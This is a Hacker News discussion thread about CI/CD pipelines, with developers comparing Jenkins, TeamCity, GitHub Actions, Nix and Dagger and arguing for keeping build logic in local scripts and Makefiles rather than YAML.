Already see people saying GitLab is better: yes it is, but it also sucks in different ways.
After years of dealing with this (first Jenkins, then GitLab, then GitHub), my takeaway is:
* Write as much CI logic as possible in your own code. Does not really matter what you use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code.
* Invest time so that your pipelines can also run locally on a developer machine (as much as possible, at least); otherwise testing/debugging pipelines becomes a nightmare.
* Avoid YAML as much as possible, period.
* Don't bind yourself to some fancy new VC-financed thing that will solve CI once and for all but needs to get monetized eventually (see: earthly, dagger, etc.)
* Always use your own runners, on-premise if possible
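The first bullet can be sketched as a single entrypoint script. This is a minimal illustration, not anyone's actual setup — the script name and tasks are made up, and the real bodies would call your build tool:

```shell
#!/usr/bin/env sh
# ci.sh - all CI logic lives here, not in the platform's YAML.
# Both the CI job and a developer laptop run the same thing: sh ci.sh <task>
set -eu

build() { echo "building..."; }     # stand-in for e.g. make build / go build ./...
run_tests() { echo "testing..."; }  # stand-in for e.g. make test / go test ./...

case "${1:-all}" in
  build) build ;;
  test)  run_tests ;;
  all)   build; run_tests ;;
  *)     echo "unknown task: $1" >&2; exit 1 ;;
esac
```

The CI config then shrinks to one step that runs `sh ci.sh test`, and the exact same command works on any laptop.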
hi_hi 7 days ago [-]
I came to the exact same conclusion accidentally in my first role as a Tech Lead a few years back.
It was a large enterprise CMS project. The client had previously told everyone they couldn't automate deployments due to the hosted platform security, so deployments of code and configs were all done manually by a specific support engineer following a complex multistep run sheet. That was going about as well as you'd expect.
I first solved my own headaches by creating a bunch of bash scripts to package and deploy to my local server. Then I shared that with the squads to solve their headaches. Once the bugs were ironed out, the scripts were updated to deploy from local to the dev instance. Jenkins was then brought in and quickly set up to use the same bash scripts, so now we had full CI/CD working to dev and test. Then the platform support guy got bored manually following the run sheet approach and started using our (now mature) scripts to automate deployments to stage and prod.
By the time the client found out I'd completely ignored their direction they were over the moon because we had repeatable and error free automated deployments from local all the way up to prod. I was quite proud of that piece of gorilla consulting :-)
badloginagain 7 days ago [-]
I hate the fact that CI peaked with Jenkins. I hate Jenkins, I hate Groovy, but for every company I've worked for there's been a 6-year-uptime Jenkins instance casually holding up the entire company.
There's probably a lesson in there.
mike_hearn 7 days ago [-]
It peaked with Jenkins? I'm curious which CI platforms you've used.
I swear by TeamCity. It doesn't seem to have any of these problems other people are facing with GitHub Actions. You can configure it with a GUI, or in XML, or using a type safe Kotlin DSL. These all actually interact so you can 'patch' a config via the GUI even if the system is configured via code, and TeamCity knows how to store config in a git repository and make commits when changes are made, which is great for quick things where it's not worth looking up the DSL docs or for experimentation.
The UI is clean and intuitive. It has all the features you'd need. It scales. It isn't riddled with insecure patterns like GH Actions is.
DanielHB 7 days ago [-]
I think people just hate CI set up by other people. I used TeamCity in a job a few years back and I absolutely hated it, however I imagine a lot of my hatred was the way it was set up.
CI is just the thing no one wants to deal with, yet everyone wants to just work. And like any code or process, you need engineering to make it good. And like any project, you can't just blame bad tools for crappy results.
orthoxerox 6 days ago [-]
I think people just hate enterprise CI/CD. Setting up a pipeline for your own project isn't this hard and provides immediate value. But then you start getting additional requirements like "no touching your CI/CD code", "no using plugins except A, B or C" and "deployment must be integrated with Rally/Microfocus/another corporate change management system". Suddenly your pipelines become weird and brittle and feel like busywork.
mike_hearn 7 days ago [-]
It seems to inspire strong feelings. I set it up at a previous company and at some point after I left they replaced it with Jenkins. However, nobody could explain to me why or what problems they thought they were solving. The feedback was the sort of thing you're saying now: a dislike that can't be articulated.
Whereas, I could articulate why I didn't like Jenkins just fine :)
bluGill 7 days ago [-]
I would feel that way, but I've had the misfortune to work with a wide-open CI system where any developer could make changes, and one guy did. The locked-down system prevents me from making some changes I want, but in return my builds don't suddenly start failing because some CI option was turned on for everyone.
HeavyStorm 7 days ago [-]
I totally prefer to have the ci break from time to time and be able to fix it than having the risk of it being broken and having no way of fixing it
bluGill 7 days ago [-]
The people who admin our CI system do a good job, so it doesn't break (well, it does all the time, but on network-type errors, not configuration - that is IT's fault, not theirs).
The things I want to change are things I do in the build system, so they're checked in and available for previous versions when we need to build them (we are embedded, where field failure is expensive, so there are typically branches for the current release, next release, and head). This also means anything that can fail on CI can fail on my local system (unless it depends on something like the number of cores on the machine running the build).
While the details can be slightly different, how we have CI is how it should be. Most developers should have better things to do than worry about how to configure CI.
DanielHB 6 days ago [-]
In our CI we do a lot of clever stuff like posting comments to github PRs, sending messages on slack, etc. Even though those are useful things it makes the CI a bit harder to make changes to and test. Making it do more things also makes it a bit of a blackbox.
__float 7 days ago [-]
TeamCity's "config as code" feels a bit like an afterthought to me. It's very Windows-style, where PowerShell got bolted on, and you're still fighting a bit of an upstream current getting clickops users out of old habits. (I've also only experienced it at .NET-stack jobs, though, so I might be a bit biased :-)
(I don't recall _loving_ it, though I don't have as many bad memories of it as I do for VSTS/TFS, GitLab, GH Actions, Jenkins Groovyfiles, ...)
eXpl0it3r 6 days ago [-]
The quotes around "config as code" are necessary unfortunately, because TeamCity only allows minimal config changes. The UI will always show the configuration from the main branch and if you remove or add steps it might not work.
We needed two more or less completely different configurations for old and new versions of the same software (think hotfix for past releases), but TeamCity can't handle this scenario at all. So now we have duplicated the configuration and some hacky version checks that cancel incompatible builds.
Maybe their new Pipeline stuff fixes some of these shortcomings.
dmuso 7 days ago [-]
Try doing a clean git clone in TeamCity. Nope, not even with the plugins that claim “clean clone” capability. You should be confident that CI can build/run/test an app with a clean starting point. If the CI forces a cached state on an agent that you can’t clear… TeamCity just does it wrong.
mike_hearn 6 days ago [-]
You just check the "delete files in checkout directory" box in the run screen. Are you thinking of something different? I've never had trouble doing a clean clone.
dmuso 6 days ago [-]
It’s been a while since I used it but I do remember that it doesn’t do a clean checkout and you can’t force it to. It leaves artifacts on the agent that can interfere with subsequent builds. I assume they do it for speed but it can affect reliability of builds
mike_hearn 6 days ago [-]
I don't know when you used it, but I've used it for years and it's always had that feature in every version I've used.
GabrielTFS 6 days ago [-]
git clean refuses to work ?
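For reference, a full scrub of a working copy looks roughly like this. A small demo in a throwaway repo, with the caveat that `-x` also deletes ignored files, which may include caches you'd rather keep:

```shell
# Demo in a throwaway repo so the scrub is safe to try.
repo="$(mktemp -d)"
cd "$repo"
git init -q .
echo tracked > kept.txt
git add kept.txt
git -c user.email=ci@example.com -c user.name=ci commit -qm init

echo junk > leftover.o      # untracked artifact from a previous build
git clean -xfd              # -x: ignored files too, -f: force, -d: directories
git reset --hard -q         # restore tracked files to HEAD state

ls                          # only kept.txt remains
```

If the CI agent runs this between builds, each build starts from the committed tree only.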
ForTheKidz 6 days ago [-]
> You can configure it with a GUI, or in XML, or using a type safe Kotlin DSL.
This is making me realize I want a CI with as few features as possible. If I'm going to spend months of my life debugging this thing I want as few corners to check as I can manage.
mike_hearn 6 days ago [-]
I've never had to spend time debugging TeamCity setups. It's very transparent and easy to understand (to me, at least).
I tend to stick with the GUI because if you're doing JVM style work the complexity and tasks is all in the build you can run locally, the CI system is more about task scheduling so it's not that hard to configure. But being able to migrate from GUI to code when the setup becomes complex enough to justify it is a very nice thing.
finnthehuman 7 days ago [-]
Jenkins is cron with bells and whistles. The result is a pile of plugins to capture all the dimensions of complexity you'd otherwise bury in the shell script, but want easier to point and click at. I'll hate on Jenkins with the rest of them, but entropy is gonna grow and Jenkins isn't gonna say "no, you can't do that here". I deal with multiple tools where, if I made fun of how low the Jenkins plugin install stats are, you'd know exactly where I work. Once I've calmed down from working on CI I can appreciate Jenkins' attempts to manage all of it.
Any CI product play has to differentiate in a way that makes you dependent on them. Sure it can be superficially nicer when staying inside the guard rails, but in the age of docker why has the number of ways I configure running boring shell scripts gone UP? Because they need me unable to use a lunch break to say "fuck you I don't need the integrations you reserve exclusively for your CI" and port all the jobs back to cron.
And that's why jenkins is king.
marcosdumay 6 days ago [-]
And the lesson is that you want a simple UI to launch shell scripts, maybe with complex triggers but probably not.
If you make anything more than that, your CI will fail. And you can do that with Jenkins, so the people that did it saw it work. (But Jenkins can do so much more, which is the entire reason so many people have nightmares just by hearing that name.)
skor 7 days ago [-]
Well, I got tired of Groovy and found out that using Jenkins with plain bash under source control is just right for us. Runs everywhere, very fast to test/develop, and it's all easy to change and improve.
We build Docker images mostly so ymmv.
I have a "port to github actions" ticket in the backlog but I think we're not going to go down that road now.
__float 7 days ago [-]
Yeah, I've come back around to this: you do not want "end users" writing Groovy, because the tooling around it is horrible.
You'll have to explain the weird CPS transformations, you'll probably end up reading the Jenkins plugins' code, and there's nothing fun down this path.
k4rli 7 days ago [-]
It's feature complete. Anything more will just be bloat; if anything, probably at least 25% of it could be cut.
rrr_oh_man 7 days ago [-]
> gorilla consulting
Probably 'guerilla', but I like your version more.
hi_hi 7 days ago [-]
Haha, I'm gonna admit it, all these years and I thought gorilla/guerilla was one of those American/British spelling things, like cheque/check or gaol/jail. Boy do I feel stupid.
lenova 7 days ago [-]
Ahaha, I love the honesty here. I think we should adopt gorilla consulting into mainstream nonetheless.
Aeolun 6 days ago [-]
I feel like gorilla consulting is one of those things that’s often deliberately misspelled? For no other reason than that it’s funny.
maest 7 days ago [-]
..."gaol"?
QuercusMax 7 days ago [-]
It's the British spelling of "jail", as in "John Bunyan, a prominent Puritan preacher and author, spent 12 years in Bedford Gaol from 1660 to 1672." Pronounced jail, I believe.
sd9 6 days ago [-]
It’s the Gaelic spelling of “jail”. It hasn’t been used in mainstream British English since the 60s, outside of specific place names. Everyone in England says “jail” or “prison” today. It might be a bit different in Ireland.
williamdclt 6 days ago [-]
Interesting! I assumed it was one of these loaned-but-misspelled words from French (geôle, pronounced johl with a soft j). I wonder if there’s a common etymology between the French and Gaelic
squiggleblaz 6 days ago [-]
I think the PP was mistaken when they attributed it to Gaelic. It does indeed come from an antecedent of geôle; probably the spelling comes from the Norman form whereas the pronunciation comes from more widespread French forms. In any case, it isn't a case of "loaned-but-misspelled"; English got most of these words from times before French had standard spellings or - as in this case - pronunciations. And once they became part of English, they were subject to the future developments of English as English words, no longer French. It's like saying "geôle" is just misspelt Latin "caveola".
DonHopkins 7 days ago [-]
That's when the devs all wear gorilla suits in Zoo meetings.
Wikipedia: Gorilla Suit: National Gorilla Suit Day:
Nix is awesome for this -- write your entire series of CI tools in shell or Python and run them locally in the exact same environment as they will run in CI. Add SOPS to bring secrets along for the ride.
jimbokun 6 days ago [-]
Would Nix work well with GitHub Actions? Or is it more of a replacement? How do you automate running tests and deploying to dev on every push, for example?
lewo 6 days ago [-]
> Would Nix work well with GitHub Actions?
You can use Nix with GitHub Actions since there is a Nix GitHub action: https://github.com/marketplace/actions/install-nix. Every time the action is triggered, Nix rebuilds everything, but thanks to its caching (which needs to be configured), it only rebuilds targets that have changed.
> How do you automate running tests and deploying to dev on every push
Note there are also several Nix CIs that can do a better job than raw GitHub Actions, because they are designed for Nix (Hydra, Garnix, Hercules, ...).
noplacelikehome 6 days ago [-]
One neat Nix feature is development shells, which let you define isolated shell environments that can be activated by invoking `nix develop` (or via direnv upon entering a directory):
Since I'm doing this within a Nix flake all of the dependencies for this environment are recorded in a lock file. Provided my clone of the repo is up to date I should have the same versions.
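A sketch of what such a flake might look like — the channel and package names here are illustrative, not from the comment:

```nix
{
  description = "dev shell pinned by flake.lock";

  inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-24.05";

  outputs = { self, nixpkgs }:
    let
      pkgs = nixpkgs.legacyPackages.x86_64-linux;
    in {
      devShells.x86_64-linux.default = pkgs.mkShell {
        # whatever the project actually needs
        packages = [ pkgs.go pkgs.nodejs pkgs.sops ];
      };
    };
}
```

`nix develop` drops you into this environment locally; CI enters the same shell, so tool versions match by construction as long as flake.lock is committed.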
SOLAR_FIELDS 5 days ago [-]
You can combine this with direnv and auto-activate the nix environment when you `cd` into directories as well. We do this, and just activate the shell in ci environments with a cache. Works great.
turboponyy 6 days ago [-]
Yes. GitHub actions can be just a thin wrapper to call any Nix commands that you can run locally.
> How do you automate running tests
You just build the Nix derivation that runs your tests, e.g. `nix build .#tests` or `nix flake check` in your workflow file.
> deploying to dev on every push
You can set up a Nix `devShell` as a staging area for any operations you'd need to perform for a deployment. You can use the same devShell both locally and in CI. You'd have to inject any required secrets into the Action environment in your repository settings, still. It doesn't matter what your staging environment is comprised of, Nix can handle it.
mikepurvis 7 days ago [-]
Strongly isolated systems like Nix and Bazel are amazing for giving no-fuss local reproducibility.
Every CI "platform" is trying to seduce you into breaking things out into steps so that you can see their little visualizations of what's running in parallel or write special logic in groovy or JS to talk to an API and generate notifications or badges or whatever on the build page. All of that is cute, but it's ultimately the tail wagging the dog— the underlying build tool should be what is managing and ordering the build, not the GUI.
What I'd really like for next gen CI is a system that can get deep hooks into local-first tools. Don't make me define a bunch of "steps" for you to run, instead talk to my build tool and just display for me what the build tool is doing. Show me the order of things it built, show me the individual logs of everything it did.
Same thing with test runners. How are we still stuck in a world where the test runner has its own totally opaque parallelism regime and our only insight is whatever it chooses to dump into XML at the end, which will be probably be nothing if the test executable crashes? Why can't the test runner tell the CI system what all the processes are that it forked off and where each one's respective log file and exit status is expected to be?
steeleduncan 7 days ago [-]
> Write as much CI logic as possible in your own code
Nix really helps with this. It's not just that you do everything via a single script invocation, local or CI; you do it in an identical environment, local or CI. You are not trying to debug the difference between Ubuntu as set up in GHA and Arch as it is on your laptop.
Setting up a nix build cache also means that any artefact built by your CI is instantly available locally which can speed up some workflows a lot.
mikepurvis 7 days ago [-]
Absolutely. Being able to have a single `nix build` line that gets all the way from source to your final asset (iso, ova, container image, whatever) with everything being aggressively cached all the way along is a game changer. I think it's worth the activation energy for a lot more organizations than realize it.
fiddlerwoaroof 7 days ago [-]
Imo, the “activation energy” is a lot lower than it appears too. The Determinate Systems Nix installer solves a lot of the local development issues, and it's fairly easy, as a first pass, to write a simple derivation that just copies your current build process and uses Nix for dependencies.
jimbokun 6 days ago [-]
Sounds like a business that surfaces the power of Nix with a gentle learning curve as a simpler, cleaner CI tool could have some success. Every time I see Nix come up, it’s described as very powerful but difficult to learn to use.
shykes 7 days ago [-]
Dagger.io does this out of the box:
- Everything sandboxed in containers (works the same locally and in CI)
- Integrate your build tools by executing them in containers
- Send traces, metrics and logs for everything at full resolution, in the OTEL format. Visualize in our proprietary web UI, or in your favorite observability tool
nand_gate 7 days ago [-]
It's doa, Sol.
shykes 7 days ago [-]
Since you're using my first name in a weird and creepy way, I'll assume you're a hater. It's been so long since I've had one! Are you reactivating from the Docker days, or are you the first of a new cohort? That would be an exciting development, since getting haters is a leading sign of runaway success.
nand_gate 13 hours ago [-]
Not a hater - nobody will contest that Docker was a huge success, congrats... I just don't think Dagger has legs tbh.
nand_gate 7 days ago [-]
Why would you need extra visualisation anyway, tooling like Nix is already what you see is what you get!
jkarni 7 days ago [-]
It’s still helpful to eg fold different phases in Nix, and different derivation output.
I work on garnix.io, which is exactly a Nix-based CI alternative for GitHub, and we had to build a lot of these small things to make the experience better.
squiggleblaz 6 days ago [-]
Basically an online version of nix-output-monitor. Might be half an idea. But it doesn't get you 100%: you get CI, but not CD.
mikepurvis 6 days ago [-]
Delivery meaning the deployment part? I think by necessity that does differ a bit from what happens locally, just because suddenly there's auth, inventory, maybe a staging target, whatever.
All of that is a lot more than what a local dev would want, deploying to their own private test instance, probably with a bunch of API keys that are read-only or able to write only to other areas meant for validation.
specialist 7 days ago [-]
We used to just tail the build script's output.
Maybe add some semi-structured log/trace statements for the CI to scrape.
No hooks necessary.
mikepurvis 7 days ago [-]
That works so long as the build script is just doing a linear series of things. But if it's anything remotely modern then a bunch of stuff is going on in parallel, and if all the output is being funneled to a single log, you can end up with a fair bit of wind-down spew you have to scroll through to find the real/initial failure.
How much better would it be if the CI web client could just say, here's everything the build tool built, with their individual logs, and here's a direct link to the one that failed, which canceled everything else?
teeray 7 days ago [-]
> What I'd really like for next gen CI is a system that can get deep hooks into local-first tools.
But how do you get that sweet, sweet vendor-lock that way? /s
doix 7 days ago [-]
I came from the semiconductor industry, where everything was locally hosted Jenkins + bash scripts. The Jenkins job would just launch the bash script that was stored in Perforce (VCS), so all you had to do to run things locally was run the same bash script.
When I joined my first web SaaS startup I had a bit of a culture shock. Everything was running on 3rd party services with their own proprietary config/language/etc. The base knowledge of POSIX/Linux/whatever was almost completely useless.
I'm kinda used to it now, but I'm not convinced it's any better. There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
Xcelerate 7 days ago [-]
Haha, I had the same experience going from scientific work in grad school to big tech. The phrase “a solution in search of a problem” comes to mind. The additional complexity does create new problems however, which is fine for devops, because now we have a recursive system of ensuring job security.
It blows my mind what is involved in creating a simple web app nowadays compared to when I was a kid in the mid-2000s. Do kids even do that nowadays? I’m not sure I’d even want to get started with all the complexity involved.
DrFalkyn 6 days ago [-]
Creating a simple web app isn’t that hard.
If you want to use a framework The React tutorials from Traversy media are pretty good. You can even do cross platform into mobile app with frameworks like React Native or Flutter if you want iOS/Android native apps.
Vite has been a godsend for React/Vue. It’s no longer the circus it was in the mid 2010s. Google’s monopoly has made things easier for web devs. No more babel or polyfill or createReactApp.
People do still avoid frameworks and use raw HTML/CSS/Javascript. HTMX has made server fetches a lot easier.
You probably want a decent CSS framework for responsive design. Minimalist ones like Tailwind have become more popular.
If you need a backend and want to do something simple you can use BaaS (Backend as a Service) platforms like Firebase. Otherwise, setting up a NodeJS server with some SQL or KV store like SQLite or MongoDB isn't too difficult.
CI/CD systems exist to streamline testing and deployment for large complex apps. But for individual hobbyist projects it’s not worth it.
7 days ago [-]
sgarland 7 days ago [-]
> I'm kinda used to it now, but I'm not convinced it's any better.
It’s demonstrably worse.
> The base knowledge of POSIX/Linux/whatever was almost completely useless.
Guarantee you, 99% of the engineering team there doesn’t have that base knowledge to start with, because of:
> There are so many layers of abstraction now that I'm not sure anybody truly understands it all.
Everything is constantly on fire, because everything is a house of cards made up of a collection of XaaS, all of which are themselves houses of cards written by people similarly clueless about how computers actually operate.
I hate all of it.
zamalek 7 days ago [-]
> I'm not convinced it's any better.
Your Jenkins experience is more valuable and worth replicating when you get the opportunity.
verdverm 7 days ago [-]
We're doing the same, but replacing the bash script with Dagger.
Once you get on Dagger, you can turn your CI into minimal Dagger invocations and write the logic in the language of your choice. Runs the same locally and in automation
pdimitar 7 days ago [-]
Would love to see a more detailed write-up on this way of using Dagger.
verdverm 7 days ago [-]
The idea is a common pattern among Dagger users, but you can do the same with bash scripts, python, or any entrypoint. It's more of a CI ethos, and for me Dagger is an implementation detail.
I personally hold Dagger a bit differently from most, by writing a custom CLI and using the Dagger Go SDK directly. This allows you to do more host-level commands, as everything in a Dagger session runs in a container (builds and arbitrary commands).
I've adopted the mono/megarepo organization and have a pattern that also includes CUE in the solution. Starting to write that up here: https://verdverm.com/topics/dev/dx
nsonha 7 days ago [-]
it's just common sense, which is unfortunately lost with sloppy devs. People go straight from junior dev to SRE without learning engineering principles through building products first.
jimbokun 6 days ago [-]
I feel like more time is spent getting CI working these days than on the actual applications.
Between that and upgrading for security patches. Developing user impacting code is becoming a smaller and smaller part of software development.
cookiengineer 7 days ago [-]
This.
I heavily invested in a local runner based CI/CD workflow. First I was using gogs and drone, now the forgejo and woodpecker CI forks.
It runs with multiple redundancies because it's a pretty easy setup to replicate on decentralized hardware. The only thing that's a little painful is authentication and cross-system pull requests, so we still need our single point of failure to merge feature branches and do code reviews.
Due to us building everything in Go, we also decided to always have a /toolchain/build.go so that we have everything in a single language, and don't even need bash in our CI/CD podman/docker images. We just use FROM scratch, with Go, and that's it. The only exception is when we need to compile/rebuild our eBPF kernel modules.
To me, personally, the GitHub Actions CVE from August 2024 was the final nail in the coffin. I blogged about it in more technical detail [1], and guess what the reason was that the tj-actions were compromised last week? Yep, you guessed right: the same attack surface that GitHub refuses to fix, a year later.
The only tool, as far as I know, that somehow validates against these kinds of vulnerabilities is zizmor [2]. All other tools validate schemas, not vulnerabilities and weaknesses.
My years using Concourse were a dream compared to the CI/CD pains of trying to make github actions work (which I fortunately didn't have to do a lot of). Add that to the list of options for people who want open source and their own runners
regularfry 6 days ago [-]
One of the very few CI platforms that I've heard spoken well of was a big shared Concourse instance where the entire pipeline was predefined. You added some scripts named by convention to your project to do the right thing at each step, and it all just worked for you. Keeping it running was the job of a specific team.
sleepybrett 7 days ago [-]
Did they finally actually say how the tj-actions repo got compromised? When I was fixing that shit on Saturday it was still 'we don't know how they got access!?!?'
cookiengineer 6 days ago [-]
(I'm assuming you read my technical article about the problem)
If you take a look at the pull requests in e.g. the changed-files repo, it's pretty obvious what happened. You can still see some of the malformed git branch names and other things that the bots tried out. There were lots of "fixes" afterwards that just changed environment variable names from PAT_TOKEN to GITHUB_TOKEN and similar things, which kind of just delays the problem until the malware runs again with different code.
As a snarky sidenote: The Wiz article about it is pretty useless as a forensics report, I expected much more from them. [1]
The conceptual issue is that this is not fixable unless github decides to rewrite their whole CI/CD pipeline, because of the arbitrary data sources that are exposed as variables in the yaml files.
The proper way to fix this (as GitHub) would be to implement a mandatory linter step or similar, and let a tool like zizmor check the workflow file. If it fails, refuse to run the workflow.
Whenever possible I now just use GitHub actions as a thin wrapper around a Makefile and this has improved my experience with it a lot. The Makefile takes care of installing all necessary dependencies and runs the relevant build/Test commands. This also enables me to test that stuff locally again without the long feedback loop mentioned in other comments in this thread.
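Roughly the shape of that setup — target names and commands here are just an example, not the commenter's actual Makefile:

```make
# Makefile - the workflow YAML only ever calls these targets,
# so `make test` behaves the same locally and in CI.
.PHONY: deps test build

deps:            # install/verify toolchain and dependencies
	./scripts/install-deps.sh

test: deps
	go test ./...

build: deps
	go build -o bin/app ./cmd/app
```

The GitHub Actions job then contains little more than a checkout step and `run: make test`.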
In addition to the other comments suggesting dagger is not the saviour due to being VC-funded, it seems like they have decided there's no money in CI, but AI... yes there's money there! And "something something agents".
From dagger.io...
"The open platform for agentic software.
Build powerful, controllable agents on an open ecosystem. Deploy agentic applications with complete visibility and cross-language capabilities in a modular, extensible platform.
Use Dagger to modernize your CI, customize AI workflows, build MCP servers, or create incredible agents."
shykes 7 days ago [-]
Hello! Dagger CEO here. Yes, we discovered that, in addition to running CI pipelines, Dagger can run AI agents. We learned this because our own users have told us.
So now we are trying to capitalize on it, hence the ongoing changes to our website. We are trying to avoid the "something something agents" effect, but clearly, we still have work to do there :) It's hard to explain in marketing terms why an ephemeral execution engine, cross-language component system, deep observability and interactive CLI can be great at running both types of workloads... But we're going to keep trying!
Internally we never thought of ourselves as a CI company, but as an operating system company operating in the CI market. Now we are expanding opportunistically to a new market: AI agents. We will continue to support both, because our platform can run both.
Please be careful. I'd love to adopt Dagger, but the UI, in comparison to GHA, is just not a value add. I'd hate for y'all to go the AI route that Arc did... and lose all your users. There is A LOT to CI/CD, which can be profitable. I think there's still a lot more features needed before it's compelling, and I would worry Agentic AI will lead you to a hyper-configurable, muddled message.
shykes 7 days ago [-]
Thank you. Yes, I worry about muddling the message. We are looking for a way to communicate more clearly on the fundamentals, then layer use cases on top. It is the curse of all general-purpose platforms (we had the same problem with Docker).
The risk of muddling is limited to the marketing, though. It's the exact same product powering both use cases. We would not even consider this expansion if it wasn't the case.
For example, Dagger Cloud implements a complete tracing suite (based on OTEL). Customers use it for observability of their builds and tests. Well, it turns out you can use the exact same tracing product for observability of AI agents too. And it turns out that observability is a huge unresolved problem of AI agents! The reason is that, fundamentally, AI agents work exactly like complicated builds: the LLM is building its state, one transformation at a time, and sometimes it has side effects along the way via tool calling. That is exactly what Dagger was built for.
So, although we are still struggling to explain this reality to the market: it is actually true that the Dagger platform can run both CI and AI workflows, because they are built on the same fundamentals.
oulipo 6 days ago [-]
On another note, I'd love if you open-sourced your timeline / log UI component :) it's quite pretty, and could be useful in many contexts haha
Or I'll ask v0.dev to reimplement it, but I think it'd be more complete if you did it
oulipo 6 days ago [-]
Hmmmm... so I think the crux of the matter is here: you need to clearly articulate why your platform (for both containers and agents) is really helpful for handling cases where there are both state and side-effects
I can understand what you're trying to say, but because I don't have clear "examples" at hand which show me why, in practice, handling such cases is problematic and why your platform makes that smooth, I don't "immediately" see the value-add
For me right now, the biggest "value-added" that I perceive from your platform is just the "CI/CD as code", a bit the same as say Pulumi vs Terraform
But I don't see clearly the other differences that you mention (eg observability is nice, but it's more "sugar" on top, not a big thing)
I have the feeling that indeed the clean handling of "state" vs "side-effects" (and what it implies for caching / retries / etc) is probably the real value here, but I fail to perceive it clearly (mostly because I probably don't (or not yet) have those issues in my build pipelines)
If you were to give a few examples / ELI5 of this, it would probably help convert more people (eg: I would definitely adopt a "clean by default" way of doing things if I knew it would help me down the road when some new complex-to-handle use-cases will inevitably pop up)
oulipo 6 days ago [-]
I did ask you on your Discord, but perhaps you could summarize here / ELI5 why Dagger would be a great fit for a kind of "MCP-like" operating system?
__float 7 days ago [-]
I can't really fault them too much for hopping on the latest bandwagon, if their software is general enough at running workflows for it to fit.
(As much as I personally like working with CI and build systems, it's true there's not a ton of money in it!)
jimbokun 6 days ago [-]
Take out each reference to AI and the meaning doesn’t change in the slightest.
lou1306 7 days ago [-]
> * Don't bind yourself to some fancy new VC-financed thing that will solve CI once and for all but needs to get monetized eventually (see: earthly, dagger, etc.)
Literally from comment at the root of this thread.
verdverm 7 days ago [-]
Docker has raised money, we all use it. Dagger is by the originators of Docker; I personally feel comfortable relying on them, and they are making revenue too.
triyambakam 7 days ago [-]
But are mise and dagger VC funded? I don't see any pricing pages there.
Mise indeed isn't, but its scope is quite a bit smaller than Dagger.
internetter 7 days ago [-]
> Mise indeed isn't, but its scope is quite a bit smaller than Dagger.
A lot of us could learn... do one thing and do it well
arcanemachiner 7 days ago [-]
Ironic, because mise is a glued-together combination of asdf, direnv, and Makefiles.
fireflash38 6 days ago [-]
I implemented a thing such that the makefiles locally use the same podman/docker images as the CI/CD uses. Every command looks something like:
target:
	$(DOCKER_PREFIX) build
When run in gitlab, the DOCKER_PREFIX is a no-op (it's literally empty due to the CI=true var), and the 'build' command (whatever it is) runs in the CI/CD docker image. When run locally, it effectively is a `docker run -v $(pwd):$(pwd) build`.
It's really convenient for ensuring that if it builds locally, it can build in CI/CD.
akanapuli 7 days ago [-]
I don't quite understand the benefit. How does running commands from the Makefile differ from running commands directly on the runner? What benefit does the Makefile bring here?
ZeWaka 7 days ago [-]
You can't run GitHub Actions YAML workflows locally (officially, at least; there are tools like act).
fiddlerwoaroof 7 days ago [-]
If you have your CI runner use the same commands as local dev, CI basically becomes an integration test for the dev workflow. This also solves the “broken setup instructions” problem.
mwenge 7 days ago [-]
Do you have a public example of this? I'd love to see how to do this with Github Actions.
cmsj 7 days ago [-]
I don't have a makefile example, but I do functionally the same thing with shell scripts.
I let GitHub actions do things like the initial environment configuration and the post-run formatting/annotation, but all of the actual work is done by my scripts:
After years of trial and error our team has come to the same conclusion. I know some people might consider this insanity, but we actually run all of our scripts as a separate C# CLI application (the main application is a C# web server). Effectively no bash scripts, except as the entry point here and there. The build step and passing the executable around is a small price to pay for the gain in static type checking, being able to pull in libraries as needed, and knowing that our CI is not going to go down because someone made a dumb typo somewhere.
The other thing I would add is consider passing in all environment variables as args. This makes it easy to see what dependencies the script actually needs, and has the bonus of being even more portable.
baq 7 days ago [-]
> I know some people might consider this insanity
Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines. This is insane. You’re actually introducing much needed sanity into the process by admitting that a real programming language is the tool to use here.
I can’t imagine the cognitive dissonance Lisp folks have when dealing with this madness, not being one myself.
TeMPOraL 7 days ago [-]
> I can’t imagine the cognitive dissonance Lisp folks have when dealing with this madness, not being one myself.
After a decade trying to fight it, this one Lisper here just gave up. It was the only way to stay sane.
I remain hopeful that some day, maybe within our lifetimes, the rapid inflation phase of the software industry will end, and we'll have time to rethink and redo the fundamentals properly. Until then, one can at least enjoy some shiny stuff, and stay away from the bleeding edge, aka where the sewage flows out of the pipe and meets the sea.
(It's gotten a little easier now, as you can have LLMs deal with YAML-programming and other modern worse-is-better "wisdom" for you.)
no_wizard 7 days ago [-]
I'm shocked there isn't a 'language for config' that has become the de facto standard; it's YAML all the way down, seemingly. I am with you 100%.
It would really benefit from a language that intrinsically understands it's being used to control a state machine. As it is, what nearly all folks want in practice is a way to run different things based on different states of CI.
A lisp DSL would be perfect for this. Macros would make things a lot easier in many respects.
Unfortunately, there's no industry consensus and none of the big CI platforms have adopted support for anything like that, they all use variants of YAML (I always wondered who started it with YAML and why everyone copied that, if anyone knows I'd love to read about it).
Honestly, I can say the same complaints hold up against the cloud providers too. Those 'infrastructure as code' SDKs really don't lean into the 'as code' part very well
julik 6 days ago [-]
I think the issue here is mostly the background the CI setups came from. They were frequently coming from the "ops" part of the ecosystem, and some ops folks held some ideas very strongly back then (I heard this first hand):
"Application and configuration should be separate, ideally in separate repos. It is the admin's job to configure, not the developer's"
"I do not need to learn your garbage language to understand how to deploy or test your application"
"...as a matter of fact, I don't need to learn the code and flows of the application itself either - give me a binary that runs. But it should work with stale configs in my repo."
"...I know language X works for the application but we need something more ubiquitous for infra"
Then there was a crossover of three streams, as I would call it:
- YAML was emerging "hard" on the shoulders of Rails
- Everyone started hating on XML (and for a good reason)
- Folks working on CI services (CruiseControl and other early solutions) and ops tooling (chef, ansible) saw JSON's shortcomings (now an entire ecosystem has configuration files with no capability to put in a comment)
Since everybody hated each other's languages, the lowest common denominator for "configuration code" came out to be YAML, and people begrudgingly agreed to use it
The situation then escalated severely with k8s, which adopted YAML as "the" configuration language, and a whole ecosystem of tooling sprung up on top using textual templating (!) of YAML as a layer of abstraction. For k8s, having a configuration language was an acute need, because with a compiled language you need something for configuration that you don't have to compile with the same toolchain just to use - and I perfectly "get it" why they settled for YAML. I also get why tools like Helm were built on top of YAML trickery - because, had Helm been written in some other language, with its charts using that language, it would have alienated all the developers that either hate that language personally or do not have it on the list of "golden permitted" languages at their org.
